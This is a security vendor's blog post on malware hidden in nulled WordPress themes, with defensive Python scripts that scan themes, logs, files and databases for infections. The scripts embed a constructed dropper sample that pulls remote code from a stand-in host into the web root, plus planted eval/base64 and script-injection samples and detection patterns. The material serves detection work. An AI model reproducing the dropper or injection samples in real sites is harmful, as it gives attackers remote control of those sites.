Malware in nulled WordPress themes…The story continues…

The subject is familiar to most WordPress developers and to the people who maintain websites. Everyone who takes website security seriously follows the advice, but there are still people who take the short-cut and install nulled themes and plugins. They are not saving money to add more modules to their website; they are handing a remote management option for the website to the attacker.

We have published articles before about websites that you should not rely on to download plugins or themes. Today I am going to talk about another such website, “freewordpresthemes [dot] com”. It offers a few WordPress themes for free download, and they come packed with malware. We found them during our regular inspection of the malware reported by our scanner engine, so the cPGuard scanner engine already protects you from the particular malware injected into their package.

Now let us take a look at the actual injection in their package. The injected code sits in the theme's “functions.php” file and refers to a TXT file hosted on their website.

The injected code pulls content from their website, creates a new file under the public web space of the site and writes code into it. That file is the remote hand for the attackers: it sits in the document root, so they can reach it over the web whenever they like.

So what does that mean? Installing and enabling this theme opens your website to an anonymous person who can make changes to it without your permission.
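The pattern described above (theme code that fetches content from a remote host and writes it into the public web root) can be hunted for with a simple source-level check. The script below is an added example written for this post, not cPGuard's scanner code. Both functions.php samples are constructed for the demo; the malicious one uses the reserved domain example.invalid, not the site named in the post, and the indicator lists are this example's own heuristics.

```python
"""Heuristic check for the dropper pattern: PHP that fetches remote content
and writes it into the document root.  Added example, not cPGuard's code.
The two functions.php samples below are constructed for this demo."""
import os
import re
import tempfile

# Calls that pull content over the network.
REMOTE_FETCH = re.compile(r"\b(file_get_contents|curl_exec|fopen|fsockopen)\s*\(", re.I)
# A literal remote URL anywhere in the file.
REMOTE_URL = re.compile(r"https?://[^\s'\"]+", re.I)
# Calls that create or overwrite files on disk.
LOCAL_WRITE = re.compile(r"\b(file_put_contents|fwrite|fputs|copy|rename)\s*\(", re.I)
# Path anchors that resolve inside the document root.
WEBROOT_PATH = re.compile(r"(ABSPATH|WP_CONTENT_DIR|get_home_path\s*\(|\$_SERVER\s*\[\s*['\"]DOCUMENT_ROOT['\"]\s*\])")
# Runtime code execution / obfuscation often paired with droppers.
EXEC_OR_OBFUSCATION = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13|assert)\s*\(", re.I)

BENIGN_FUNCTIONS_PHP = r"""<?php
// Constructed sample: ordinary theme bootstrap code.
function demo_theme_scripts() {
    wp_enqueue_style('demo-style', get_stylesheet_uri());
    wp_enqueue_script('demo-js', get_template_directory_uri() . '/js/main.js', array('jquery'), '1.0', true);
}
add_action('wp_enqueue_scripts', 'demo_theme_scripts');
"""

DROPPER_FUNCTIONS_PHP = r"""<?php
// Constructed sample of the injected pattern: pull a .txt from a remote
// host and store its contents as a PHP file in the document root.
function demo_theme_init() {
    $c = @file_get_contents('http://example.invalid/theme.txt');
    if ($c) { @file_put_contents(ABSPATH . 'wp-cache.php', $c); }
}
add_action('init', 'demo_theme_init');
"""


def indicators(src):
    """Return the indicator names found in one PHP source string."""
    found = []
    if REMOTE_FETCH.search(src) and REMOTE_URL.search(src):
        found.append("remote_fetch")
    if LOCAL_WRITE.search(src):
        found.append("local_write")
    if WEBROOT_PATH.search(src):
        found.append("webroot_path")
    if EXEC_OR_OBFUSCATION.search(src):
        found.append("exec_or_obfuscation")
    return found


def is_dropper_like(src):
    """The post's pattern needs all three: remote fetch, local write, web-root path."""
    return {"remote_fetch", "local_write", "webroot_path"} <= set(indicators(src))


def scan_tree(root):
    """Relative paths of PHP files under `root` that match the pattern."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if is_dropper_like(fh.read()):
                        hits.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(hits)


def demo():
    """Write both samples into a temporary themes directory and scan it."""
    root = tempfile.mkdtemp(prefix="themes-")
    for theme, src in (("clean-theme", BENIGN_FUNCTIONS_PHP), ("nulled-theme", DROPPER_FUNCTIONS_PHP)):
        os.makedirs(os.path.join(root, theme))
        with open(os.path.join(root, theme, "functions.php"), "w", encoding="utf-8") as fh:
            fh.write(src)
    return scan_tree(root)


if __name__ == "__main__":
    print(demo())
```

On a live server you would point scan_tree at wp-content/themes (and wp-content/plugins). Treat a hit as a lead to read the file, not as proof: some commercial themes ship their own update code that also downloads and writes files, and a real dropper is often obfuscated so that the function names never appear in clear text, which is why the exec_or_obfuscation indicator is worth reporting on its own.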

So how can you escape such threats? There is only one answer: download themes and plugins from reliable sources. Be ready to pay for the software that serves your requirements, or find alternative options, instead of taking such short-cuts. Even though there are numerous incidents and reports about this issue, people who do not act wisely will end up in this kind of trouble.

You can also deploy security solutions like cPGuard on your server to protect you from such threats. But ultimately, if security matters, it is not recommended to use any nulled software.

Tips to find malware in WordPress websites

WordPress is always a hot choice for website hackers and is therefore one of the web applications that receives the most attacks. On a shared web hosting server in particular, it is interesting to check the logs of the WordPress websites and compare them against the logs of the other websites on the same server. The result is self-explanatory in most cases: a ton of brute-force attempts, generic attacks and targeted attacks that try to exploit the WordPress websites. The rate of attack attempts is much higher for WordPress websites than for other web apps.
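The comparison above is easy to put into numbers. The script below is an added example, not part of cPGuard or the original post: it tallies attack-style requests per virtual host from access log lines. The log lines are constructed in Apache vhost_combined format with documentation IP ranges, and the indicator categories (login POSTs, xmlrpc POSTs, author enumeration, 404s on WordPress paths) are this example's own choice.

```python
"""Tally attack-style requests per virtual host from web server access logs,
to compare a WordPress site against a non-WordPress neighbour.  Added
example, not part of cPGuard; the log lines are constructed."""
import re
from collections import Counter

# Apache vhost_combined lines ("%v:%p %h %l %u %t \"%r\" %>s %O ..."), constructed.
SAMPLE_LOG = """\
example.com:80 203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "POST /wp-login.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
example.com:80 203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "POST /wp-login.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
example.com:80 198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4321 "-" "python-requests/2.31"
example.com:80 203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
example.com:80 198.51.100.7 - - [10/Oct/2023:13:56:30 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "python-requests/2.31"
example.com:80 203.0.113.5 - - [10/Oct/2023:13:57:01 +0000] "GET /wp-content/plugins/revslider/readme.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0"
example.com:80 192.0.2.10 - - [10/Oct/2023:13:58:44 +0000] "GET /about/ HTTP/1.1" 200 9876 "https://example.com/" "Mozilla/5.0"
static.example.net:80 192.0.2.11 - - [10/Oct/2023:13:59:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
static.example.net:80 192.0.2.11 - - [10/Oct/2023:13:59:01 +0000] "GET /css/site.css HTTP/1.1" 200 512 "https://static.example.net/" "Mozilla/5.0"
static.example.net:80 203.0.113.5 - - [10/Oct/2023:13:59:30 +0000] "GET /wp-login.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<vhost>[^\s:]+)(?::\d+)? (?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')


def classify(method, path, status):
    """Map one request to an attack indicator, or None for ordinary traffic."""
    if method == "POST" and path.startswith("/wp-login.php"):
        return "wp_login_post"      # credential brute force
    if method == "POST" and path.startswith("/xmlrpc.php"):
        return "xmlrpc_post"        # brute force / pingback abuse via XML-RPC
    if "?author=" in path:
        return "author_enum"        # user-name enumeration before a brute force
    if status == "404" and (path.startswith("/wp-") or path.startswith("/xmlrpc")):
        return "wp_path_404"        # probing for WordPress files that are not there
    return None


def summarize(log_text):
    """Per-vhost request totals, indicator counts and the IPs behind them."""
    per_host = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                # skip lines that are not in the expected format
        h = per_host.setdefault(m["vhost"], {"total": 0, "indicators": Counter(), "attack_ips": set()})
        h["total"] += 1
        kind = classify(m["method"], m["path"], m["status"])
        if kind:
            h["indicators"][kind] += 1
            h["attack_ips"].add(m["ip"])
    # Flatten to plain types so the result is easy to print or compare.
    return {
        vhost: {
            "total": h["total"],
            "attack_requests": sum(h["indicators"].values()),
            "indicators": dict(h["indicators"]),
            "attack_ips": sorted(h["attack_ips"]),
        }
        for vhost, h in per_host.items()
    }


def report():
    return summarize(SAMPLE_LOG)


if __name__ == "__main__":
    for vhost, h in report().items():
        print(f"{vhost}: {h['attack_requests']}/{h['total']} attack-style requests, "
              f"{h['indicators']}, from {h['attack_ips']}")
```

On a cPanel server the per-domain logs live in separate files rather than carrying a vhost prefix, so you would feed each file to summarize with the domain prepended, or adapt LOG_RE to the plain combined format. The same source IP hitting wp-login.php on the WordPress site and probing the static site is the kind of cross-site pattern the comparison is meant to surface.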

Where you can find the infections

There are many methods for exploiting WordPress websites, and new types of attacks and vulnerabilities are reported as time goes on. You can usually find the infected code in a WordPress website in

1. The File System where you physically store the Website Files
2. The database associated with the website

In both cases the hackers add external code to execute their logic and thus abuse the compromised website.

1. How to find hacked WordPress files

The hacker targets the files and tries to modify existing files or upload new ones carrying malicious code. Many times they target the plugins, themes or uploads directories, but it is not limited to those. When you do a manual lookup, you can start with the following steps


  • Check the DocumentRoot of the website and ensure that there are no unknown files or folders there. If you find unknown folders or files (especially ones with gibberish names), inspect them specifically.
  • Check the wp-content/plugins directory and make sure that no plugin directory exists that you did not install. Also, list the most recently updated PHP files under the plugins folder and verify the list.
  • Check the wp-content/themes directory and make sure that no theme directory exists that you did not install. Also, list the most recently updated PHP files under the themes folder and verify the list.
  • Ensure that no PHP or other interpreted files have been uploaded to the wp-content/uploads folder. This folder is meant to store media files only and is not supposed to execute any code.
  • Use the wp-cli tool to check the integrity of the core and plugin files: "wp core verify-checksums" and "wp plugin verify-checksums --all" compare the installed files against the checksums published by WordPress.org. Note that this only covers core and plugins hosted in the WordPress.org directory, not themes or commercial plugins.
  • You can also use a WordPress security plugin like Wordfence to scan for other hidden hacked files under the website.
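The manual steps above can be scripted. The following is an added example written for this post, not cPGuard's scanner: it walks a WordPress document root and reports unknown root entries, plugin and theme directories that are not on your list, interpreted files inside uploads, recently modified PHP files and gibberish-looking names. The sample site tree is constructed in a temporary directory, the list of stock root entries is the one a current WordPress release ships, and the "gibberish name" rule is a simple heuristic of this example.

```python
"""Walk a WordPress document root and apply the manual file-system checks.
Added example, not cPGuard's scanner code; the sample site is constructed
in a temporary directory and the gibberish-name rule is a heuristic."""
import os
import re
import tempfile
import time

# Entries a stock WordPress root (5.x / 6.x) is expected to contain.
CORE_ROOT_ENTRIES = {
    ".htaccess", "index.php", "license.txt", "readme.html", "wp-activate.php",
    "wp-admin", "wp-blog-header.php", "wp-comments-post.php", "wp-config.php",
    "wp-config-sample.php", "wp-content", "wp-cron.php", "wp-includes",
    "wp-links-opml.php", "wp-load.php", "wp-login.php", "wp-mail.php",
    "wp-settings.php", "wp-signup.php", "wp-trackback.php", "xmlrpc.php",
}
# Extensions a web server or CGI handler may execute; none belong in uploads.
INTERPRETED_EXT = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar",
                   ".cgi", ".pl", ".py", ".sh"}
HEX_NAME = re.compile(r"^[0-9a-f]{8,}$")
NO_VOWELS = re.compile(r"^[b-df-hj-np-tv-z0-9_-]{6,}$")


def looks_gibberish(name):
    """Heuristic: long hex strings, or 6+ characters without a vowel."""
    stem = name.rsplit(".", 1)[0].lower() if "." in name else name.lower()
    return bool(HEX_NAME.match(stem) or NO_VOWELS.match(stem))


def _rel(path, root):
    return os.path.relpath(path, root).replace(os.sep, "/")


def _ext(name):
    return os.path.splitext(name)[1].lower()


def scan_site(root, known_plugins, known_themes, recent_days=7):
    """Return a dict of findings for the WordPress install under `root`."""
    cutoff = time.time() - recent_days * 86400
    f = {k: [] for k in ("unknown_root_entries", "unknown_plugins", "unknown_themes",
                          "executable_in_uploads", "recently_modified_php", "gibberish_names")}
    # Unexpected entries directly in the document root.
    f["unknown_root_entries"] = sorted(n for n in os.listdir(root) if n not in CORE_ROOT_ENTRIES)
    # Plugin / theme entries you did not install (the index.php placeholder is stock).
    for key, sub, known in (("unknown_plugins", "plugins", known_plugins),
                            ("unknown_themes", "themes", known_themes)):
        d = os.path.join(root, "wp-content", sub)
        if os.path.isdir(d):
            f[key] = sorted(n for n in os.listdir(d) if n != "index.php" and n not in known)
    # One walk over the whole tree for the remaining checks.
    uploads = os.path.join(root, "wp-content", "uploads")
    for dirpath, dirs, files in os.walk(root):
        for n in dirs + files:
            if looks_gibberish(n):
                f["gibberish_names"].append(_rel(os.path.join(dirpath, n), root))
        for n in files:
            p = os.path.join(dirpath, n)
            if p.startswith(uploads + os.sep) and _ext(n) in INTERPRETED_EXT:
                f["executable_in_uploads"].append(_rel(p, root))
            if _ext(n) == ".php" and os.path.getmtime(p) > cutoff:
                f["recently_modified_php"].append(_rel(p, root))
    for k in ("gibberish_names", "executable_in_uploads", "recently_modified_php"):
        f[k].sort()
    return f


def build_sample_site():
    """Constructed sample tree: stock files plus one planted finding per check."""
    root = tempfile.mkdtemp(prefix="wp-")
    files = [
        "index.php", "wp-config.php", "wp-login.php", "wp-load.php",
        "xqzkwt.php",                                   # gibberish file in the root
        "a8f3c9d2e1/index.php",                         # gibberish directory in the root
        "wp-content/plugins/index.php",
        "wp-content/plugins/akismet/akismet.php",
        "wp-content/plugins/wp-seo-helper/helper.php",  # plugin the owner never installed
        "wp-content/themes/twentytwenty/functions.php",
        "wp-content/themes/twentytwenty/style.css",
        "wp-content/uploads/2023/01/photo.jpg",
        "wp-content/uploads/2023/01/shell.php",         # code inside the media folder
        "wp-content/uploads/2023/01/img.phtml",
    ]
    old = time.time() - 60 * 86400
    for rel in files:
        p = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w", encoding="utf-8") as fh:
            fh.write("<?php // sample\n" if rel.endswith((".php", ".phtml")) else "sample\n")
        os.utime(p, (old, old))                         # everything looks two months old...
    os.utime(os.path.join(root, "wp-content", "plugins", "akismet", "akismet.php"), None)
    return root                                         # ...except one plugin file touched just now


def demo():
    root = build_sample_site()
    return scan_site(root, known_plugins={"akismet"}, known_themes={"twentytwenty"})


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run scan_site against the real document root with the plugin and theme lists you actually installed; a recently modified PHP file is only suspicious if you did not update anything in that window, so record the date of your last legitimate update before reading that list.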

2. How to find hacked WordPress database contents

This is trickier than finding compromised files, as it needs more manual effort to track down the injected code in the database. Take a backup of the current database before making any changes to it. To start the investigation, you can do the following


  • Check the WordPress admin user list and make sure that it does not contain unknown users.
  • Take a dump of the database and search it for the suspicious content (spammy keywords, links) that you found on your website.
  • Check the post contents and take note of any kind of JS injection.
  • Take a look at the wp_options table and ensure that there are no unexpected entries there (for instance a changed siteurl/home, or widget text containing code).
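The checks above are plain SQL once you know which tables to look in. The script below is an added example written for this post, not cPGuard's code: it runs the queries against an in-memory SQLite copy of the relevant tables, with rows constructed for the demo. On a live site you would run the same queries (with your own table prefix) against MySQL or MariaDB, after taking a backup; the spam and code keyword lists are this example's own and should be extended with whatever you saw abused on your site.

```python
"""Database-side checks for a hacked WordPress site, run as SQL against an
in-memory SQLite copy of wp_users / wp_usermeta / wp_posts / wp_options.
Added example, not cPGuard's code; all rows are constructed for the demo."""
import sqlite3

# Constructed keyword lists; extend with what you actually saw abused.
SPAM_TERMS = ("viagra", "casino", "payday loan")
CODE_TERMS = ("<script", "<iframe", "eval(", "base64_decode", "gzinflate")


def load_sample_db():
    """Minimal copies of the four tables with one planted finding per check."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
        CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT,
                               post_content TEXT, post_status TEXT);
        CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT,
                                 option_value TEXT);
    """)
    admin_caps = 'a:1:{s:13:"administrator";b:1;}'      # how WordPress serializes the role
    db.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", [
        (1, "owner", "owner@example.com"),
        (2, "editor1", "editor@example.com"),
        (3, "wp_support", "support@example.invalid"),   # admin the owner never created
    ])
    db.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?, ?)", [
        (1, 1, "wp_capabilities", admin_caps),
        (2, 2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
        (3, 3, "wp_capabilities", admin_caps),
    ])
    db.executemany("INSERT INTO wp_posts VALUES (?, ?, ?, ?)", [
        (10, "Hello world", "<p>Welcome to the site.</p>", "publish"),
        (11, "About", '<p>About us</p><script src="//example.invalid/j.js"></script>', "publish"),
        (12, "Old draft", "Buy cheap viagra online", "draft"),
    ])
    db.executemany("INSERT INTO wp_options VALUES (?, ?, ?)", [
        (1, "siteurl", "https://example.com"),
        (2, "home", "https://example.com"),
        (3, "blogname", "Demo site"),
        (4, "widget_text", 'a:1:{i:2;a:1:{s:4:"text";s:33:"<?php eval(base64_decode($x)); ?>";}}'),
    ])
    return db


def _like_any(column, terms):
    """Build 'col LIKE ? OR col LIKE ?' for a fixed, trusted list of terms."""
    return " OR ".join(f"{column} LIKE ?" for _ in terms), [f"%{t}%" for t in terms]


def administrators(db):
    """Logins that carry the administrator capability (any table prefix)."""
    rows = db.execute("""
        SELECT u.user_login FROM wp_users u
        JOIN wp_usermeta m ON m.user_id = u.ID
        WHERE m.meta_key LIKE '%capabilities' AND m.meta_value LIKE '%administrator%'
        ORDER BY u.user_login""").fetchall()
    return [r[0] for r in rows]


def unknown_admins(db, expected):
    return [u for u in administrators(db) if u not in expected]


def posts_matching(db, terms):
    """(ID, post_title) of posts whose content contains any of the terms."""
    where, params = _like_any("post_content", terms)
    return db.execute(f"SELECT ID, post_title FROM wp_posts WHERE {where} ORDER BY ID", params).fetchall()


def suspicious_options(db):
    """Option names whose value carries code or script markup."""
    where, params = _like_any("option_value", CODE_TERMS)
    return [r[0] for r in db.execute(
        f"SELECT option_name FROM wp_options WHERE {where} ORDER BY option_name", params)]


def site_urls(db):
    """siteurl/home must point at your own domain, not an attacker's redirect."""
    return dict(db.execute(
        "SELECT option_name, option_value FROM wp_options WHERE option_name IN ('siteurl', 'home')"))


def demo():
    db = load_sample_db()
    return {
        "unknown_admins": unknown_admins(db, expected={"owner"}),
        "injected_posts": posts_matching(db, CODE_TERMS),
        "spam_posts": posts_matching(db, SPAM_TERMS),
        "suspicious_options": suspicious_options(db),
        "site_urls": site_urls(db),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The capability lookup goes through wp_usermeta because the role is not a column of wp_users; a user created directly in the database by an attacker will still show up here as long as the serialized capabilities mention administrator. Keep in mind that LIKE is case-insensitive for ASCII in both SQLite and MySQL, so "<SCRIPT" is caught as well.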

As mentioned already, this needs some expertise; if you do not know how to do this, please look for an expert to do it for you.

How to automate these checks for your website?

Searching for malicious code in your files and database is not an easy task, and doing it regularly is even harder. If you own a single website, you can depend on a security plugin or a cloud solution to scan your website regularly and report any bad files. You can also choose a hosting platform that has automatic virus checks enabled (cPGuard does this, along with WAF protection specifically for WordPress websites), which protects your website without any additional installation or cost. If you are a server owner, it is essential to install an anti-virus to protect your customers' websites from such attacks and to save your server's reputation.

cPGuard contains built-in tools to protect your WordPress websites, and the WAF module has explicit rules to stop attacks on WordPress websites and their components. Our distributed network helps us detect the latest attack attempts, keep the software up to date and defend against the latest WordPress attacks.